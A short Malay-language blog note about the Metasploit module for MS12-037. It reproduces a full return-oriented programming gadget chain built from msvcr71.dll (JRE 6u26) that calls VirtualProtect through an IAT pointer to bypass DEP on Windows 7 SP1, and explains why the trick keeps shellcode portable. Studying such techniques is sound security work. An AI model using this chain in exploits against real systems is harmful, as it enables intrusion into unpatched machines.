22 June 2012

ROP Guna "hard-coded address" (IAT)

metasploit: ms12-037

Ada 2 rop implementation, satu utk xp sp3, satu lagi utk win7 sp1

Merujuk rop utk win7 sp1, guna msvcr71.dll( jre-6 update-26)


0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0x00001000, # (dwSize)
0x7c347f98, # RETN (ROP NOP)
0x7c3415a2, # JMP [EAX]
0xffffffff,
0x7c376402, # skip 4 bytes
0x7c345255, # INC EBX # FPATAN # RETN
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7c344f87, # POP EDX # RETN
0x00000040, # flNewProtect
0x7c34d201, # POP ECX # RETN
0x7c38b001, # &Writable location
0x7c347f97, # POP EAX # RETN
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
0x7c345c30, # ptr to 'push esp # ret 'Baris 3 terakhir: (0x7c37a151  + 0x0EF )adalah merujuk kepada lokasi kawasan yang mana maklumat IAT disimpan utk dll msvcr71.dll.  Data dalam alamat tersebut adalah pointer kepada kernel32.VirtualProtect. 

Jadi, walaupun address hard-coded digunakan utk call VirtualProtect, tapi shellcode ini tetap portable.  
Kudos to metasploit for expose this nice trick.


No comments:

Post a Comment

Terima kasih